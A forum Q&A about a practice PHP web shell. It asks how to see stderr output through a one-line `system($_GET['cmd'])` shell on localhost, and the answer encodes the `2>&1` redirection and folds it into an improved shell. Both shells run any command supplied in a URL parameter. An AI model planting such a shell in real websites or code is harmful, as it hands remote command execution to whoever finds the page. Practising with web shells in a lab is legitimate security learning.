Tags: php, linux, stdout, stderr, penetration-testing

View stderr output in simple PHP web shell


I'm not sure if this is more a PHP question than a Linux question, but here goes.

I am practicing with web shells, and have a very simple one that looks like this:

<?php system($_GET['cmd']); ?>

In my terminal I can view the help file for netcat, like so:

nc -h

I believe this outputs to stderr. In my terminal, I can redirect the output to a file like so:

nc &> blah

Then I can cat blah and see the results. However, if I try the same trick through the PHP web shell, no file is created, i.e. running these commands does nothing:

http://localhost/shell.php?cmd=nc -h &> blah
#encoded
http://localhost/shell.php?cmd=nc%20-h%20%26%3E%20blah

Why is it failing in my webshell and what tweak do I need to make in my syntax to have it work? I can issue commands (for example, ls or ls --version), and see standard output just fine.

Ultimately, I'd like to avoid writing to a file altogether, and just see ALL output of a command in my web shell, but I figured this would be an easier first step. Suggestions for the latter are welcome!


Solution

  • I figured it out.

    The issue is the ampersand is throwing off the web shell command, so it's what needs to be escaped. Skipping the file write, we can redirect stderr to stdout to see all output (stdout and stderr) in the browser like so:

    ?cmd=nc -h 2>%261
    

    Furthermore, instead of appending 2>%261 to every command, the web shell can be modified to do the lifting for us:

    <?php system($_GET['cmd'] . ' 2>&1'); ?>
    

    Then we can just execute our commands directly, and see both stderr and stdout output in the browser:

    ?cmd=nc -h
    

    It doesn't appear to respect the original output format but that's for another question...